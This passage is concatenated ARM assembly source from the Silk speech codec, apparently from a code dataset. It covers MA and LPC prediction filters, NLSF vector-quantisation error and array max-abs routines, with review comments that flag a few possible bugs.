smlabt ma_new_s2, ma_in_val, ma_b_val, ma_s2_val /* S[d+2] + in16*B[d+1] */
ldmia ma_s!, {ma_s1_val, ma_s2_val}
ldr ma_b_val, [ma_b], #4
subs ma_order, ma_order, #2
stmia r1!, {ma_new_s1, ma_new_s2}
bgt LR(1, b)
/* Loop epilogue: final three state updates. */
smlabb ma_new_s1, ma_in_val, ma_b_val, ma_s1_val
smlabt ma_new_s2, ma_in_val, ma_b_val, ma_s2_val
ldr ma_s1_val, [ma_s], #-12 /* rewind S to the write position */
ldr ma_b_val, [ma_b]
str ma_new_s1, [ma_s], #4
str ma_new_s2, [ma_s], #4
smlabb ma_new_s1, ma_in_val, ma_b_val, ma_s1_val
smulbt ma_new_s2, ma_in_val, ma_b_val /* last state slot: no accumulate */
subs ma_len, ma_len, #1
str ma_new_s1, [ma_s], #4
str ma_new_s2, [ma_s]
bgt LR(0, b)
add sp, sp, #16
ldmia sp!, {r4-r10, fp, ip, pc}
/* Register roles for the halfword (unaligned-B / odd-order) path. */
VARDEF ma1_in, r6
VARDEF ma1_out, sb
VARDEF ma1_s0_val, lr /* S[0] cached in a register across samples */
VARDEF ma1_b, _r7
VARDEF ma1_s, r8
VARDEF ma1_b_val, r2
VARDEF ma1_s1_val, r3
VARDEF ma1_b0_val, r1
VARDEF ma1_s2_val, r2
// order % 2 != 0
/*MA_Prediction_ORDER_2BYTE: */
L(9)
add r2, r2, #4 /* saved S points past S[0]; S[0] lives in ma1_s0_val */
str r0, [sp, #SAVE_IN]
str r1, [sp, #SAVE_B]
str r2, [sp, #SAVE_S]
str r3, [sp, #SAVE_OUT]
mov ma1_in, r0
mov ma1_out, r3
ldr ma1_s0_val, [r2, #-4] /* cache S[0] */
L(0)
ldrsh ma_in_val, [ma1_in], #2
ldr ma_order, [sp, #arg_order]
ldr ma1_b, [sp, #SAVE_B]
ldr ma1_s, [sp, #SAVE_S]
rsb ma_out_val, ma1_s0_val, ma_in_val, lsl #12 /* (in16 << 12) - S[0] */
ldrsh ma1_b_val, [ma1_b], #2
qadd ma_out_val, ma_out_val, ma_out_val
ldr ma1_s1_val, [ma1_s]
qadd ma_out_val, ma_out_val, ma_out_val
smlabb ma1_s0_val, ma_in_val, ma1_b_val, ma1_s1_val /* new S[0] */
mov ma1_s1_val, #32768
qadd ma_out_val, ma_out_val, ma_out_val
qadd ma_out_val, ma_out_val, ma_out_val /* sat(16 * tmp) */
qadd ma_out_val, ma_out_val, ma1_s1_val /* + 0x8000: rounding bias */
mov ma_out_val, ma_out_val, asr #16
sub ma_order, ma_order, #3
ldr ma1_s1_val, [ma1_s, #4]
strh ma_out_val, [ma1_out], #2
ldrsh ma1_b0_val, [ma1_b], #2
/* Inner loop: one state update per iteration, halfword coefficients. */
L(1)
smlabb ma1_s2_val, ma_in_val, ma1_b0_val, ma1_s1_val
ldr ma1_s1_val, [ma1_s, #8]
ldrsh ma1_b0_val, [ma1_b], #2
str ma1_s2_val, [ma1_s], #4
subs ma_order, ma_order, #1
bgt LR(1, b)
smlabb ma1_s2_val, ma_in_val, ma1_b0_val, ma1_s1_val
ldrsh ma1_b0_val, [ma1_b], #2
str ma1_s2_val, [ma1_s], #4
smulbb ma1_s2_val, ma_in_val, ma1_b0_val /* last state slot: no accumulate */
subs ma_len, ma_len, #1
str ma1_s2_val, [ma1_s]
bgt LR(0, b)
ldr r2, [sp, #SAVE_S]
str ma1_s0_val, [r2, #-4] /* write cached S[0] back to memory */
add sp, sp, #16
ldmia sp!, {r4-r10, fp, ip, pc}
/*
* void SKP_Silk_MA_Prediction_Q13(
* const SKP_int16 *in, I: input signal
* const SKP_int16 *B, I: MA coefficients, Q13 [order+1]
* SKP_int32 *S, I/O: state vector [order]
* SKP_int16 *out, O: output signal
* const SKP_int32 len, I: signal length
* const SKP_int32 order I: filter order
* )
*
*
*/
/* ARMv5 implementation of SKP_Silk_MA_Prediction_Q13() (C prototype in
 * the comment block above).  Same structure as SKP_Silk_MA_Prediction,
 * but the input is scaled by << 13 (Q13 coefficients) and rounding uses
 * three saturating doublings (8x) before the +0x8000 / asr #16 step,
 * i.e. out[k] = sat16(round(((in[k] << 13) - S[0]) >> 13)). */
VARDEF maq13_s, ip /* state pointer S */
VARDEF maq13_b, lr /* coefficient pointer B */
VARDEF maq13_in, sb /* input pointer */
VARDEF maq13_out, sl /* output pointer */
VARDEF maq13_in_val, r0 /* current input sample in[k] */
VARDEF maq13_out_val, r1 /* output accumulator */
VARDEF maq13_order, r5 /* inner-loop counter derived from order */
VARDEF maq13_len, r4 /* remaining output samples */
VARDEF maq13_s1, r1 /* S[0] / loop state (aliases maq13_out_val) */
VARDEF maq13_s2, r2
VARDEF maq13_s3, r3
VARDEF maq13_b1, r6 /* packed coefficient pair */
VARDEF maq13_s1_new, _r7
VARDEF maq13_s2_new, r8
/* Spill slots for the four pointer arguments. */
.set SAVE_IN, 0
.set SAVE_B, 4
.set SAVE_S, 8
.set SAVE_OUT, 12
.globl SYM(SKP_Silk_MA_Prediction_Q13)
SYM(SKP_Silk_MA_Prediction_Q13):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #16
/* Stack offsets of the 5th/6th C arguments after push + sub above. */
.set arg_len, 56
.set arg_order, 60
/*LOAD INPUT ARGS*/
ldr maq13_order, [sp, #arg_order]
ldr maq13_len, [sp, #arg_len]
ands _r7, r1, #3 /* B not word aligned? -> halfword path */
bne LR(2, f)/*MA_Prediction_Q13_ORDER_2BYTE*/
ands r6, r5, #1 /* odd order? -> halfword path */
bne LR(2, f)/*MA_Prediction_Q13_ORDER_2BYTE*/
cmp r5, #6 /* short filters also use the halfword path */
blt LR(2, f)/*MA_Prediction_Q13_ORDER_2BYTE*/
// order % 2 == 0
str r0, [sp, #SAVE_IN]
str r1, [sp, #SAVE_B]
str r2, [sp, #SAVE_S]
str r3, [sp, #SAVE_OUT]
mov maq13_in, r0
mov maq13_out, r3
/* Outer loop: one output sample per iteration. */
L(0)
ldr maq13_s, [sp, #SAVE_S]
ldr maq13_b, [sp, #SAVE_B]
ldrsh maq13_in_val, [maq13_in], #2
ldr maq13_s1, [maq13_s], #4
ldr maq13_order, [sp, #arg_order]
ldr maq13_s2, [maq13_s], #4
rsb maq13_s3, maq13_s1, maq13_in_val, lsl #13 /* (in16 << 13) - S[0] */
ldr maq13_b1, [maq13_b], #4 /* B[0], B[1] packed */
qadd maq13_out_val, maq13_s3, maq13_s3 /* three saturating doublings ... */
sub maq13_order, maq13_order, #4
mov r3, #32768
qadd maq13_out_val, maq13_out_val, maq13_out_val
qadd maq13_out_val, maq13_out_val, maq13_out_val /* ... = sat(8 * tmp) */
qadd maq13_out_val, maq13_out_val, r3 /* + 0x8000: rounding bias */
ldr maq13_s3, [maq13_s], #4
mov maq13_out_val, maq13_out_val, asr #16 /* round + narrow to 16 bits */
strh maq13_out_val, [maq13_out], #2
/* Inner loop: shift the state FIFO down two entries per iteration. */
L(1)
smlabb maq13_s1_new, maq13_in_val, maq13_b1, maq13_s2 /* S[d+1] + in16*B[d] */
smlabt maq13_s2_new, maq13_in_val, maq13_b1, maq13_s3 /* S[d+2] + in16*B[d+1] */
ldr maq13_s2, [maq13_s], #4
ldr maq13_s3, [maq13_s], #-16 /* read ahead, rewind to write position */
ldr maq13_b1, [maq13_b], #4
subs maq13_order, maq13_order, #2
str maq13_s1_new, [maq13_s], #4
str maq13_s2_new, [maq13_s], #16 /* write, then skip forward again */
bgt LR(1, b)
/* Loop epilogue: final three state updates. */
smlabb maq13_s1_new, maq13_in_val, maq13_b1, maq13_s2
smlabt maq13_s2_new, maq13_in_val, maq13_b1, maq13_s3
ldr maq13_s2, [maq13_s], #-12
ldr maq13_b1, [maq13_b]
str maq13_s1_new, [maq13_s], #4
str maq13_s2_new, [maq13_s], #4
smlabb maq13_s1_new, maq13_in_val, maq13_b1, maq13_s2
smulbt maq13_s2_new, maq13_in_val, maq13_b1 /* last state slot: no accumulate */
subs maq13_len, maq13_len, #1
str maq13_s1_new, [maq13_s], #4
str maq13_s2_new, [maq13_s]
bgt LR(0, b)
add sp, sp, #16
ldmia sp!, {r4-r10, fp, ip, pc}
/* Register roles for the halfword (unaligned-B / odd-order) path.
 * S[0] is cached in lr across samples and written back at the end. */
VARDEF ma1q13_s, r8
VARDEF ma1q13_b, _r7
VARDEF ma1q13_in, r6
VARDEF ma1q13_out, sb
VARDEF ma1q13_s1, r3
VARDEF ma1q13_s0, r2
VARDEF ma1q13_b1, r1
VARDEF ma1q13_b_tmp, r2
// order % 2 != 0
/*MA_Prediction_Q13_ORDER_2BYTE: */
L(2)
add r2, r2, #4 /* saved S points past S[0]; S[0] lives in lr */
str r0, [sp, #SAVE_IN]
str r1, [sp, #SAVE_B]
str r2, [sp, #SAVE_S]
str r3, [sp, #SAVE_OUT]
mov ma1q13_in, r0
mov ma1q13_out, r3
ldr lr, [r2, #-4] /* cache S[0] */
L(0)
ldrsh maq13_in_val, [ma1q13_in], #2
ldr maq13_order, [sp, #arg_order]
ldr ma1q13_b, [sp, #SAVE_B]
ldr ma1q13_s, [sp, #SAVE_S]
rsb maq13_out_val, lr, maq13_in_val, lsl #13 /* (in16 << 13) - S[0] */
ldrsh ma1q13_b_tmp, [ma1q13_b], #2
qadd maq13_out_val, maq13_out_val, maq13_out_val
ldr ma1q13_s1, [ma1q13_s]
qadd maq13_out_val, maq13_out_val, maq13_out_val
smlabb lr, maq13_in_val, ma1q13_b_tmp, ma1q13_s1 /* new S[0] */
mov r3, #32768
qadd maq13_out_val, maq13_out_val, maq13_out_val /* sat(8 * tmp) */
qadd maq13_out_val, maq13_out_val, r3 /* + 0x8000: rounding bias */
mov maq13_out_val, maq13_out_val, asr #16
sub maq13_order, maq13_order, #3
ldr ma1q13_s1, [ma1q13_s, #4]
strh maq13_out_val, [sb], #2
ldrsh ma1q13_b1, [ma1q13_b], #2
/* Inner loop: one state update per iteration, halfword coefficients. */
L(1)
smlabb ma1q13_s0, maq13_in_val, ma1q13_b1, ma1q13_s1
ldr ma1q13_s1, [ma1q13_s, #8]
ldrsh ma1q13_b1, [ma1q13_b], #2
str ma1q13_s0, [ma1q13_s], #4
subs maq13_order, maq13_order, #1
bgt LR(1, b)
smlabb ma1q13_s0, maq13_in_val, ma1q13_b1, ma1q13_s1
ldrsh ma1q13_b1, [ma1q13_b], #2
str ma1q13_s0, [ma1q13_s], #4
smulbb ma1q13_s0, maq13_in_val, ma1q13_b1 /* last state slot: no accumulate */
subs maq13_len, maq13_len, #1
str ma1q13_s0, [ma1q13_s]
bgt LR(0, b)
ldr r2, [sp, #SAVE_S]
str lr, [r2, #-4] /* write cached S[0] back to memory */
add sp, sp, #16
ldmia sp!, {r4-r10, fp, ip, pc}
#endif
#if EMBEDDED_ARM>=5
/* SKP_Silk_LPC_analysis_filter: short-term analysis (whitening) filter.
 * r0 = in (int16*), r1 = B (int16* coefficients), r2 = S (int16* state),
 * r3 = out (int16*), stack: len, Order.
 * Per sample: out[k] = sat16(round(((in[k] << 12) - sum(B[i]*S)) >> 12))
 * and in[k] is pushed into the head of the 16-bit state FIFO.
 * Two main loops are selected by the alignment of S; an unaligned B is
 * first copied into an aligned on-stack buffer (sp_B).
 * SKP_SMLAD is a macro (see SKP_Silk_AsmPreproc.h) -- presumably smlad
 * on ARMv6 or an equivalent smla* pair on ARMv5; confirm there. */
#define SKP_Silk_MAX_ORDER_LPC 16
/* Stack frame layout: 32-byte aligned B copy, then 4 saved pointers. */
.set sp_B, 0
.set sp_pin, 32
.set sp_pB, 36
.set sp_pS, 40
.set sp_pout, 44
.globl SYM(SKP_Silk_LPC_analysis_filter)
SYM(SKP_Silk_LPC_analysis_filter):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #48
/* Stack offsets of the 5th/6th C arguments after push + sub above. */
.set arg_len, 88
.set arg_Order, 92
VARDEF len, r4
VARDEF order, r5
VARDEF S_val, r6
VARDEF B_val, _r7
VARDEF S_tmp1, r8
VARDEF S_tmp2, sb
VARDEF out32, sl
// Registers not used in main inner loop
VARDEF in, r6
VARDEF in_Q12, _r7
VARDEF B_tmp, r6
VARDEF pB_tmp, _r7
str r0, [sp, #sp_pin]
str r1, [sp, #sp_pB]
str r2, [sp, #sp_pS]
str r3, [sp, #sp_pout]
ldr len, [sp, #arg_len]
ldr order, [sp, #arg_Order]
/*B_ALIGNMENT:*/
tst r1, #0x3
beq LR(3, f)/*S_ALIGNMENT*/
/* Copy the unaligned coefficient array into the aligned sp_B buffer. */
ldrh B_tmp, [r1], #2
add pB_tmp, sp, #sp_B
sub order, order, #1
L(0)
subs order, order, #1
/* NOTE(review): no post-increment of pB_tmp here or below, so every
 * coefficient appears to land in the same halfword slot -- looks like a
 * dropped ", #2" writeback; confirm against the upstream Silk source. */
strh B_tmp, [pB_tmp]
ldrh B_tmp, [r1], #2
bgt LR(0, b)
ldr order, [sp, #arg_Order]
strh B_tmp, [pB_tmp]
add r1, sp, #sp_B //R1 aligned pointer to B.
/*S_ALIGNMENT:*/
L(3)
tst r2, #0x3
bne LR(4, f)/*MAIN_FORLOOP1*/
/*MAIN_FORLOOP0: */
/* Word-aligned S: accumulate B.S two taps at a time while rewriting the
 * shifted state FIFO in place (mixed word/halfword accesses). */
L(0)
mov out32, #0
ldr order, [sp, #arg_Order]
/*MAIN_INNER_FORLOOP0:*/
ldr S_val, [r2], #2
ldr B_val, [r1], #4
sub order, order, #4
mov S_tmp2, S_val, lsr #16
strh S_val, [r2], #2
SKP_SMLAD out32, B_val, S_val, out32
ldr S_val, [r2]
L(1)
ldr B_val, [r1], #4
add S_tmp2, S_tmp2, S_val, lsl #16
ldr S_tmp1, [r2, #4]
subs order, order, #2
str S_tmp2, [r2], #4
SKP_SMLAD out32, B_val, S_val, out32
mov S_tmp2, S_val, lsr #16
mov S_val, S_tmp1
bgt LR(1, b)
ldr B_val, [r1]
add S_tmp2, S_tmp2, S_val, lsl #16
SKP_SMLAD out32, B_val, S_val, out32
str S_tmp2, [r2]
/* Residual: out = sat16(round(((in << 12) - prediction) >> 12)). */
ldrsh in, [r0], #2
ldr r2, [sp, #sp_pS]
ldr r1, [sp, #sp_pB]
mov in_Q12, in, lsl #12
qsub out32, in_Q12, out32
mov out32, out32, asr #11
strh in, [r2] /* push in[k] into the state head S[0] */
add out32, out32, #1
#if EMBEDDED_ARM >=6
ssat out32, #16, out32, asr #1
#else
/* Manual 16-bit saturation of (out32 >> 1) for pre-ARMv6 cores.
 * NOTE(review): mvn #0x8000 yields 0xFFFF7FFF (low half 0x7FFF) and the
 * following subge shifts that by one; verify the clamp constants against
 * the upstream source -- only the low halfword is stored below. */
mov out32, out32, asr #1
cmp out32, #0x8000
mvnge out32, #0x8000
subge out32, out32, #1
cmn out32, #0x8000
movlt out32, #0x8000
#endif
subs len, len, #1
strh out32, [r3], #2
bgt LR(0, b)
add sp, sp, #48
ldmia sp!, {r4-r10, fp, ip, pc}
/*MAIN_FORLOOP1: //pS&3!=0*/
/* Halfword-aligned S: same computation, but each 32-bit state word is
 * reassembled from two straddling halfwords before the MAC. */
L(4)
L(0)
mov out32, #0
ldr order, [sp, #arg_Order]
/*MAIN_INNER_FORLOOP1:*/
ldrh S_val, [r2], #2
ldr S_tmp1, [r2]
ldr S_tmp2, [r2, #4]
ldr B_val, [r1], #4
sub order, order, #4
add S_val, S_val, S_tmp1, lsl #16
mov S_tmp1, S_tmp1, lsr #16
str S_val, [r2], #4
SKP_SMLAD out32, B_val, S_val, out32
L(1)
ldr B_val, [r1], #4
add S_val, S_tmp1, S_tmp2, lsl #16
mov S_tmp1, S_tmp2, lsr #16
subs order, order, #2
#ifdef _WINRT
/* WinRT assembler variant: conditional load expressed as a branch. */
ble LR(2, f)
ldr S_tmp2, [r2, #4]
L(2)
#else
ldrgt S_tmp2, [r2, #4]
#endif
str S_val, [r2], #4
SKP_SMLAD out32, B_val, S_val, out32
bgt LR(1, b)
ldrsh S_tmp2, [r2]
ldr B_val, [r1]
add S_val, S_tmp1, S_tmp2, lsl #16
SKP_SMLAD out32, B_val, S_val, out32
strh S_val, [r2]
/* Residual computation: identical to the aligned path above. */
ldrsh in, [r0], #2
ldr r2, [sp, #sp_pS]
ldr r1, [sp, #sp_pB]
mov in_Q12, in, lsl #12
qsub out32, in_Q12, out32
mov out32, out32, asr #11
strh in, [r2] /* push in[k] into the state head S[0] */
add out32, out32, #1
#if EMBEDDED_ARM >=6
ssat out32, #16, out32, asr #1
#else
mov out32, out32, asr #1
cmp out32, #0x8000
mvnge out32, #0x8000
subge out32, out32, #1
cmn out32, #0x8000
movlt out32, #0x8000
#endif
subs len, len, #1
strh out32, [r3], #2
bgt LR(0, b)
add sp, sp, #48
ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 5,057 | silk/src/SKP_Silk_NLSF_VQ_sum_error_FIX_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if __arm__
#include "SKP_Silk_AsmPreproc.h"
#if ( EMBEDDED_ARM >= 6 )
/* ARMv6 implementation of SKP_Silk_NLSF_VQ_sum_error_FIX.
 * r0 = err_Q20 (int32* out), r1 = in_Q15 (32-bit values, one per word),
 * r2 = w_Q6 (32-bit weights), r3 = pCB_Q15 (int16 codebook),
 * stack: N (input vectors), K (codebook vectors), LPC_order.
 * For each of the N input vectors and each of the K codebook vectors,
 * accumulates sum over the order of ((in - cb)^2 * w) >> 16 via
 * smlawb/smlawt, writing one error per (n, k) pair.
 * The 32-bit weights are first packed pairwise into 16-bit halfwords in
 * an on-stack buffer so the inner loop consumes two taps per word.
 * Two copies of the triple loop exist: fall-through for word-aligned
 * pCB_Q15, L(4) for a halfword-aligned codebook. */
VARDEF val_N, r4 /* outer loop counter: N input vectors */
VARDEF val_K, r5 /* middle loop counter: K codebook vectors */
VARDEF val_order, r6 /* inner loop counter: LPC_order / 2 pairs */
VARDEF val_in_Q15, _r7 /* packed input pair */
VARDEF val_cb_Q15, r8 /* packed codebook pair */
VARDEF val_wtmp_Q6, sb /* packed weight pair */
VARDEF val_sum_error, sl /* per-codebook-vector accumulator */
VARDEF val_diff, ip
VARDEF val_tmp, lr
VARDEF val_in_Q15_tmp, ip
VARDEF val_wtmp_Q6_tmp, lr
VARDEF ptr_wtmp, _r7
VARDEF val0_wtmp, sb
VARDEF val1_wtmp, r5
VARDEF val2_wtmp, r8
VARDEF ptr_err_Q20, r0
VARDEF ptr_in_Q15, r1
VARDEF ptr_w_Q6, r2
VARDEF ptr_pCB_Q15, r3
/* Stack frame: 32-byte packed-weight buffer, then 4 saved pointers. */
.set sp_wtmp, 0
.set sp_err_Q20, 32
.set sp_in_Q15, 36
.set sp_w_Q6, 40
.set sp_pCB_Q15, 44
.globl SYM(SKP_Silk_NLSF_VQ_sum_error_FIX)
SYM(SKP_Silk_NLSF_VQ_sum_error_FIX):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #48
/* Stack offsets of the 5th-7th C arguments after push + sub above. */
.set ptr_N, 88
.set ptr_K, 92
.set ptr_LPC_order, 96
str r0, [sp, #sp_err_Q20]
str r1, [sp, #sp_in_Q15]
str r2, [sp, #sp_w_Q6]
str r3, [sp, #sp_pCB_Q15]
ldr val_N, [sp, #ptr_N]
ldr val_order, [sp, #ptr_LPC_order]
/* Pack the 32-bit weights pairwise into halfwords in sp_wtmp. */
ldr val1_wtmp, [r2], #4
ldr val2_wtmp, [r2], #4
sub val_order, val_order, #2
add ptr_wtmp, sp, #sp_wtmp
L(3)
pkhbt val0_wtmp, val1_wtmp, val2_wtmp, lsl #16
subs val_order, val_order, #2
ldr val1_wtmp, [r2], #4
ldr val2_wtmp, [r2], #4
str val0_wtmp, [ptr_wtmp], #4
bgt LR(3, b)
pkhbt val0_wtmp, val1_wtmp, val2_wtmp, lsl #16
str val0_wtmp, [ptr_wtmp], #4
ands val_tmp, ptr_pCB_Q15, #3 /* codebook word aligned? */
bgt LR(4, f)
/*OUTER_LOOP*/
L(2)
ldr ptr_pCB_Q15, [sp, #sp_pCB_Q15]
ldr val_K, [sp, #ptr_K]
/*MIDDLE_LOOP*/
L(1)
ldr ptr_in_Q15, [sp, #sp_in_Q15]
add ptr_w_Q6, sp, #sp_wtmp
ldr val_order, [sp, #ptr_LPC_order]
mov val_sum_error, #0
/*INNER_LOOP*/
L(0)
ldmia ptr_in_Q15!, {val_in_Q15, val_in_Q15_tmp} /* two 32-bit inputs */
ldr val_wtmp_Q6, [ptr_w_Q6], #4
ldr val_cb_Q15, [ptr_pCB_Q15], #4 /* two packed int16 codebook taps */
subs val_order, val_order, #2
pkhbt val_in_Q15, val_in_Q15, val_in_Q15_tmp, lsl #16 /* pack inputs */
ssub16 val_diff, val_in_Q15, val_cb_Q15 /* diff pair */
smulbb val_tmp, val_diff, val_diff /* diff0^2 */
smultt val_diff, val_diff, val_diff /* diff1^2 */
smlawb val_sum_error, val_tmp, val_wtmp_Q6, val_sum_error /* += (d0^2*w0)>>16 */
smlawt val_sum_error, val_diff, val_wtmp_Q6, val_sum_error /* += (d1^2*w1)>>16 */
bgt LR(0, b)
subs val_K, val_K, #1
str val_sum_error, [ptr_err_Q20], #4
bgt LR(1, b)
subs val_N, val_N, #1
str ptr_in_Q15, [sp, #sp_in_Q15] /* advance input vector for next n */
bgt LR(2, b)
add sp, sp, #48
ldmia sp!, {r4-r10, fp, ip, pc}
/* Same triple loop for a halfword-aligned codebook: pCB is read as two
 * ldrh and re-packed with pkhbt before the SIMD subtract. */
L(4)
ldr ptr_pCB_Q15, [sp, #sp_pCB_Q15]
ldr val_K, [sp, #ptr_K]
/*MIDDLE_LOOP*/
L(1)
ldr ptr_in_Q15, [sp, #sp_in_Q15]
add ptr_w_Q6, sp, #sp_wtmp
ldr val_order, [sp, #ptr_LPC_order]
mov val_sum_error, #0
/*INNER_LOOP*/
L(0)
ldmia ptr_in_Q15!, {val_in_Q15, val_in_Q15_tmp}
ldr val_wtmp_Q6, [ptr_w_Q6], #4
ldrh val_cb_Q15, [ptr_pCB_Q15], #2
ldrh val_tmp, [ptr_pCB_Q15], #2
subs val_order, val_order, #2
pkhbt val_in_Q15, val_in_Q15, val_in_Q15_tmp, lsl #16
pkhbt val_cb_Q15, val_cb_Q15, val_tmp, lsl #16
ssub16 val_diff, val_in_Q15, val_cb_Q15
smulbb val_tmp, val_diff, val_diff
smultt val_diff, val_diff, val_diff
smlawb val_sum_error, val_tmp, val_wtmp_Q6, val_sum_error
smlawt val_sum_error, val_diff, val_wtmp_Q6, val_sum_error
bgt LR(0, b)
subs val_K, val_K, #1
str val_sum_error, [ptr_err_Q20], #4
bgt LR(1, b)
subs val_N, val_N, #1
str ptr_in_Q15, [sp, #sp_in_Q15]
bgt LR(4, b)
add sp, sp, #48
ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 8,030 | silk/src/SKP_Silk_array_maxabs_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=5
/* ARMv5(E) implementation of SKP_Silk_int16_array_maxabs:
 * r0 = vec (int16*), r1 = len; returns max(|vec[i]|) in r0, clamped to
 * SKP_int16_MAX (0x7FFF).
 * Strategy: track the maximum SQUARED value (smulbb/smultt on packed
 * pairs) together with the ADDRESS of the winning element (val_ind);
 * at L(9) the element is reloaded, negated if needed, and clamped.
 * val_lvl starts at -1 so the first (non-negative) square always wins,
 * guaranteeing val_ind is initialised.
 * Five unrolled variants cover: even/odd element count, word/halfword
 * input alignment, and len < 6 (scalar loop). */
VARDEF ptr_vec, r0
VARDEF val_vec, r2 /* packed pair of input samples */
VARDEF val_return, r0
VARDEF len, r1
VARDEF val1_max, r3 /* square of the even-indexed sample */
VARDEF val2_max, r4 /* square of the odd-indexed sample */
VARDEF val_lvl, r5 /* running maximum square */
VARDEF val_ind, r6 /* address of current maximum element */
VARDEF const_int16_MAX, r5
.globl SYM(SKP_Silk_int16_array_maxabs)
SYM(SKP_Silk_int16_array_maxabs):
stmdb sp!, {r4-r6, fp, ip, lr}
add fp, sp, #20
cmp r1, #6
mvn r5, #0 /*r5 = -1(max)*/
blt LR(7, f) /* len < 6: simple scalar loop */
ands r2, r0, #3 /* halfword-aligned input? */
bne LR(3, f)
ands r2, r1, #0x1 /* odd element count? */
bne LR(1, f)
/* Word-aligned input, even count: two samples per word load. */
ldr val_vec, [ptr_vec], #4
sub len, len, #2
L(0)
smulbb val1_max, val_vec, val_vec
smultt val2_max, val_vec, val_vec
ldr val_vec, [ptr_vec], #4
cmp val1_max, r5
movge val_lvl, val1_max
#ifdef _WINRT
subge val_ind, ptr_vec, #4 /*address*/
subge val_ind, val_ind, #4 /*address*/
#else
subge val_ind, ptr_vec, #8 /*address*/
#endif
cmp val2_max, val_lvl
movge val_lvl, val2_max
subge val_ind, ptr_vec, #6
subs len, len, #2
bgt LR(0, b)
/* Epilogue: last loaded pair. */
smulbb val1_max, val_vec, val_vec
smultt val2_max, val_vec, val_vec
cmp val1_max, val_lvl
movge val_lvl, val1_max
subge val_ind, ptr_vec, #4 /*address*/
cmp val2_max, val_lvl
movge val_lvl, val2_max
subge val_ind, ptr_vec, #2
b LR(9, f)
/*Odd number of iterations*/
L(1)
ldr val_vec, [ptr_vec], #4
sub len, len, #3
L(2)
smulbb val1_max, val_vec, val_vec
smultt val2_max, val_vec, val_vec
ldr val_vec, [ptr_vec], #4
cmp val1_max, val_lvl
movge val_lvl, val1_max
#ifdef _WINRT
subge val_ind, ptr_vec, #4 /*address*/
subge val_ind, val_ind, #4 /*address*/
#else
subge val_ind, ptr_vec, #8 /*address*/
#endif
cmp val2_max, val_lvl
movge val_lvl, val2_max
subge val_ind, ptr_vec, #6
subs len, len, #2
bgt LR(2, b)
/* Epilogue: last pair plus the final odd element. */
smulbb val1_max, val_vec, val_vec
smultt val2_max, val_vec, val_vec
ldrsh val_vec, [ptr_vec], #2
cmp val1_max, val_lvl
movge val_lvl, val1_max
subge val_ind, ptr_vec, #6 /*address*/
smulbb val1_max, val_vec, val_vec
cmp val2_max, val_lvl
movge val_lvl, val2_max
subge val_ind, ptr_vec, #4
cmp val1_max, val_lvl
movge val_lvl, val1_max
subge val_ind, ptr_vec, #2 /*address*/
b LR(9, f)
/*Oddly aligned*/
